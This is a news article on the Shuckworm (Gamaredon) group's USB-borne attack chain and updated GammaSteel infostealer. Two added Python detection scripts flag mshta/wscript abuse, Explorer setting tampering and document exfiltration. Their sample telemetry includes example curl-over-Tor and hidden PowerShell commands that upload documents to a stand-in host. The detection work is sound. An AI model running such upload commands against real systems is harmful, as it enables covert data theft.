Russian Shuckworm APT is back with updated GammaSteel malware

A cyberespionage group of Russian origin that has targeted entities from Ukraine, or from countries that are helping Ukraine, has recently launched an attack against the military of a Western nation using an updated version of the GammaSteel malware.

Shuckworm, also known as Gamaredon, Aqua Blizzard, or Primitive Bear, is an APT group that is believed to be linked to the Russian Federal Security Service (the FSB). The group has targeted government, law enforcement, NGOs, and defense organizations in Ukraine for over a decade, with the first attacks reported in 2013. (Read more about the history of Russian cyberattacks on Ukraine.)

In a new campaign observed in February by researchers from Broadcom’s Symantec, the target was the military mission of an unnamed Western country in Ukraine. It used a complex attack chain with a series of obfuscated scripts and a new PowerShell-based version of the GammaSteel infostealer.

“While the group does not appear to have access to the same skill set as some other Russian groups, Shuckworm does now appear to be trying to compensate for this by continually making minor modifications to the code it uses, adding obfuscation, and leveraging legitimate web services, all to try lower the risk of detection,” the Symantec researchers said.

Attack chain launched from external drive

The infection analyzed by Symantec appears to have started with a Windows shortcut (.lnk) file named files.lnk that was launched from an external drive. The launch was recorded under the UserAssist key in the Registry, which keeps a record of the files, links, applications, and objects the current user has opened through Windows Explorer.

After that file was executed, it launched mshta.exe, a Windows binary that can be used to execute VBScript and JScript locally on Windows. In this case, it was used to execute a JavaScript command that invoked an ActiveX object and used wscript.exe to execute a file called ~.drv.

This is a highly obfuscated file whose execution resulted in the creation of two additional files with names of the format NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms. The goal of one of the files is to contact the attackers’ command-and-control (C2) server and maintain a persistent connection with it.

The C2 servers’ IP addresses are obtained by contacting URLs hardcoded in the file and retrieving the current addresses from them. The result is two IP addresses and a domain name that all point to attacker-controlled servers.

“The [C2] server is similar to others that have been used by Shuckworm in the past, as shown in an investigation by Recorded Future where the group leveraged Cloudflare tunnels for their [C2] infrastructure,” the researchers said.

The second file in the attack chain modifies Registry values in order to change how Windows Explorer displays hidden and system files. It then infects any removable drives attached to the computer by copying .lnk files into any directories found on them. This is behavior typical of USB worms.
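The chain described so far (a shortcut opened from removable media, mshta.exe handing a non-script file to wscript.exe, and Explorer's hidden-file settings being flipped) leaves traces that a detection engineer can match on endpoint telemetry. The following Python is an added example written for this page; it is not code from the article or from Symantec. It assumes Sysmon-style events as plain dictionaries (ID 1 for process creation, ID 13 for registry value set), that the caller knows which drive letters are removable, and uses constructed paths and a {GUID} placeholder for the UserAssist subkey rather than indicators from the report.

```python
"""Detections for the USB-borne infection chain described above.

Events are Sysmon-style dictionaries constructed for this example (ID 1 =
process creation, ID 13 = registry value set); paths and names are
illustrative, not indicators from the Symantec report.
"""
import codecs
import ntpath
import re

# Extensions the Windows Script Host normally runs; anything else (such as a
# .drv file) passed to wscript.exe by mshta.exe deserves a closer look.
SCRIPT_HOST_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}
# Explorer\Advanced values that decide whether hidden/system files and
# extensions are displayed; USB worms change them so their lures blend in.
DISPLAY_VALUES = {"Hidden", "ShowSuperHidden", "HideFileExt"}


def decode_userassist(value_name):
    """UserAssist value names are ROT13-encoded paths; return the clear path."""
    return codecs.decode(value_name, "rot13")


def last_argument(cmdline):
    """Return the final argument of a command line, keeping quoted paths whole."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    return tokens[-1] if len(tokens) > 1 else ""


def userassist_lnk_from_removable(ev, removable_drives):
    if ev["id"] != 13 or "\\Explorer\\UserAssist\\" not in ev["TargetObject"]:
        return None
    path = decode_userassist(ev["TargetObject"].rpartition("\\Count\\")[2])
    drive = ntpath.splitdrive(path)[0].rstrip(":").upper()
    if path.lower().endswith(".lnk") and drive in removable_drives:
        return f"shortcut {path} opened from removable drive {drive}:"
    return None


def mshta_spawning_script_host(ev, removable_drives):
    if ev["id"] != 1:
        return None
    parent = ntpath.basename(ev["ParentImage"]).lower()
    child = ntpath.basename(ev["Image"]).lower()
    if parent != "mshta.exe" or child not in {"wscript.exe", "cscript.exe"}:
        return None
    target = last_argument(ev["CommandLine"])
    if ntpath.splitext(target)[1].lower() not in SCRIPT_HOST_EXTS:
        return f"mshta.exe launched {child} on non-script file {target!r}"
    return None


def explorer_display_tampered(ev, removable_drives):
    if ev["id"] != 13:
        return None
    key, _, value = ev["TargetObject"].rpartition("\\")
    if key.lower().endswith(r"\explorer\advanced") and value in DISPLAY_VALUES:
        return f"Explorer view setting {value} changed to {ev['Details']}"
    return None


RULES = (userassist_lnk_from_removable, mshta_spawning_script_host,
         explorer_display_tampered)


def scan(events, removable_drives):
    """Run every rule over every event; return (rule name, detail) hits in order."""
    hits = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev, removable_drives)
            if detail:
                hits.append((rule.__name__, detail))
    return hits


# Constructed sample telemetry (not from the report). {GUID} stands in for the
# per-category UserAssist subkey; "R:\svyrf.yax" is ROT13 for "E:\files.lnk".
PS = r"C:\Windows\System32"
SAMPLE_EVENTS = [
    {"id": 13, "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion"
               r"\Explorer\UserAssist\{GUID}\Count\R:\svyrf.yax", "Details": "Binary Data"},
    {"id": 1, "ParentImage": PS + r"\explorer.exe", "Image": PS + r"\mshta.exe",
     "CommandLine": "mshta.exe <obfuscated argument omitted>"},
    {"id": 1, "ParentImage": PS + r"\mshta.exe", "Image": PS + r"\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Local\Temp\~.drv"'},
    {"id": 13, "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion"
               r"\Explorer\Advanced\Hidden", "Details": "DWORD (0x00000002)"},
    {"id": 13, "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion"
               r"\Explorer\Advanced\ShowSuperHidden", "Details": "DWORD (0x00000000)"},
    # Benign: an admin script run from Explorer, and an unrelated Explorer setting.
    {"id": 1, "ParentImage": PS + r"\explorer.exe", "Image": PS + r"\wscript.exe",
     "CommandLine": r"wscript.exe C:\scripts\inventory.vbs"},
    {"id": 13, "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion"
               r"\Explorer\Advanced\TaskbarGlomLevel", "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for name, detail in scan(SAMPLE_EVENTS, {"E"}):
        print(f"[{name}] {detail}")
```

The removable-drive set is passed in because drive letters alone do not identify removable media; in production it would come from the same collector that reports the registry events. The Hidden value of 2 and ShowSuperHidden of 0 are the settings that stop Explorer from showing hidden and protected system files, which is exactly what a worm planting .lnk lures wants.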

The file names observed by Symantec were in Ukrainian, but translate to terms such as: “Conduct plan”, “Special message”, “letter to”, “SPECIAL INSPECTION”, “Wound report”, “deployment”, “AIR DEFENSE COMBAT ORDER”, “Commander’s decision on defense”, “Obligation”, “Combat calculation”, “GUR support”, “Information on the dead”, “BMP”, “contract extension”, and “Reference about meeting with the source”.

On one machine, the researchers observed the C2 server delivering obfuscated code which was then launched via PowerShell. This started a chain of obfuscated scripts that reached out to more servers and downloaded additional PowerShell scripts.

One script served as a reconnaissance tool collecting information about the computer, including system information, the name of security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes. All this collected information was sent back to the C2 server.

New GammaSteel variant

The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories such as Desktop, Download, and Documents. The targeted extensions included .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt and .pdf.

The new GammaSteel version uses PowerShell web requests to exfiltrate files; if that fails, it falls back to the cURL command-line tool with a Tor proxy to send the data out. Code in the script also suggests that the web service write.as was potentially used as a further fallback exfiltration channel.
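The exfiltration behaviour just described (PowerShell web uploads of documents, a cURL-over-Tor fallback, and a possible write.as channel) can be turned into host-level heuristics. The Python below is an added example for this page, not code from the article or from Symantec. It assumes Sysmon-style events as dictionaries (ID 1 for process creation, ID 3 for network connection), assumes the Tor client listens on its default SOCKS port 9050 (the article only says a Tor proxy was used), and all hostnames, paths and command lines are constructed for illustration.

```python
"""Detections for the exfiltration fallbacks described above.

Events are Sysmon-style dictionaries constructed for this example (ID 1 =
process creation, ID 3 = network connection). The Tor port is an assumption
(Tor's default SOCKS listener); hosts and paths are illustrative.
"""
import ntpath
import re

# Extensions the article says GammaSteel collects.
TARGETED_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                 ".vsd", ".vsdx", ".rtf", ".odt", ".txt", ".pdf"}
CURL_UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file",
                     "-d", "--data", "--data-binary", "--data-raw"}
CURL_PROXY_FLAGS = {"-x", "--proxy", "--preproxy", "--socks5",
                    "--socks5-hostname", "--socks4", "--socks4a"}
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}
TOR_SOCKS_PORT = "9050"          # assumption: Tor client on its default port
PASTE_SERVICES = {"write.as"}    # named in the article as a possible channel
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "curl.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\s\"']+")
PS_UPLOAD = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|\b(?:iwr|irm)\b"
                       r"|\.Upload(?:File|Data|String)\b", re.I)
PS_BODY = re.compile(r"-Method\s+Post\b|-InFile\b|-Body\b"
                     r"|\.Upload(?:File|Data|String)\b", re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def flag_values(argv, flags):
    """Values for the given curl flags, in both '-x value' and '--flag=value' forms."""
    values = []
    for i, tok in enumerate(argv):
        name, eq, inline = tok.partition("=")
        if name in flags:
            values.append(inline if eq else (argv[i + 1] if i + 1 < len(argv) else ""))
    return values


def is_tor_proxy(value):
    """True if a proxy spec points at a loopback listener on Tor's SOCKS port."""
    host_port = value.rsplit("://", 1)[-1].rsplit("@", 1)[-1].rstrip("/")
    host, _, port = host_port.rpartition(":")
    return host.strip("[]").lower() in LOOPBACK_HOSTS and port == TOR_SOCKS_PORT


def curl_exfil(ev):
    """curl.exe sending a targeted document, or routed through local Tor."""
    if ev["id"] != 1 or ntpath.basename(ev["Image"]).lower() != "curl.exe":
        return None
    argv = tokenize(ev["CommandLine"])
    reasons = []
    if any(is_tor_proxy(v) for v in flag_values(argv, CURL_PROXY_FLAGS)):
        reasons.append("proxied through the local Tor SOCKS port")
    for v in flag_values(argv, CURL_UPLOAD_FLAGS):
        path = v.split("@", 1)[1] if "@" in v else v  # 'field=@file', '@file' or 'file'
        if ntpath.splitext(path)[1].lower() in TARGETED_EXTS:
            reasons.append(f"uploads document {path}")
    return "; ".join(reasons) or None


def powershell_upload(ev):
    """PowerShell invoking a web request that carries a body or file."""
    if ev["id"] != 1 or ntpath.basename(ev["Image"]).lower() not in {"powershell.exe", "pwsh.exe"}:
        return None
    cmd = ev["CommandLine"]
    if not (PS_UPLOAD.search(cmd) and PS_BODY.search(cmd)):
        return None
    docs = [p for p in WIN_PATH.findall(cmd) if ntpath.splitext(p)[1].lower() in TARGETED_EXTS]
    return "PowerShell web upload" + (f" of {', '.join(docs)}" if docs else "")


def network_fallback_channel(ev):
    """A script host talking to a paste service or to the local Tor port."""
    if ev["id"] != 3 or ntpath.basename(ev["Image"]).lower() not in SCRIPT_HOSTS:
        return None
    proc = ntpath.basename(ev["Image"]).lower()
    host = ev.get("DestinationHostname", "").lower()
    if host in PASTE_SERVICES:
        return f"{proc} connected to {host} (fallback exfiltration channel)"
    if ev.get("DestinationIp") in LOOPBACK_HOSTS and str(ev.get("DestinationPort")) == TOR_SOCKS_PORT:
        return f"{proc} connected to the local Tor SOCKS port"
    return None


def scan(events):
    hits = []
    for ev in events:
        for rule in (curl_exfil, powershell_upload, network_fallback_channel):
            detail = rule(ev)
            if detail:
                hits.append((rule.__name__, detail))
    return hits


# Constructed sample telemetry; nothing here is an indicator from the report.
CURL = r"C:\Windows\System32\curl.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "Image": CURL, "CommandLine": r'curl.exe --proxy socks5h://127.0.0.1:9050 '
     r'-F "file=@C:\Users\u\Documents\report.docx" https://upload.example.invalid/'},
    {"id": 1, "Image": PWSH, "CommandLine": r'powershell.exe -nop -w hidden -c "Invoke-WebRequest '
     r'-Uri https://upload.example.invalid/ -Method Post -InFile C:\Users\u\Desktop\plan.xlsx"'},
    {"id": 3, "Image": PWSH, "DestinationHostname": "write.as",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"id": 3, "Image": CURL, "DestinationHostname": "", "DestinationIp": "127.0.0.1",
     "DestinationPort": 9050},
    # Benign: a plain download, and a browser visiting the same paste service.
    {"id": 1, "Image": CURL, "CommandLine": r"curl.exe -sL -o C:\tmp\pkg.zip https://mirror.example.invalid/pkg.zip"},
    {"id": 3, "Image": r"C:\Program Files\Browser\browser.exe", "DestinationHostname": "write.as",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
]

if __name__ == "__main__":
    for name, detail in scan(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The curl rule fires on either signal alone (Tor proxy or a targeted document in an upload argument) because the fallback path in the article uses both, and a defender wants to see the proxy use even when the uploaded file name is not one of the listed extensions. Browsers are deliberately excluded from the write.as rule so that ordinary visits to the service do not page anyone.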

“This attack does mark something of an increase in sophistication for Shuckworm, which appears to be less skilled than other Russian actors, though it compensates for this with its relentless focus on targets in Ukraine,” the researchers said.

The Symantec report includes indicators of compromise such as file hashes, file names, URLs, IP addresses, and more, that can be used by security teams to build detections or threat hunting rules.
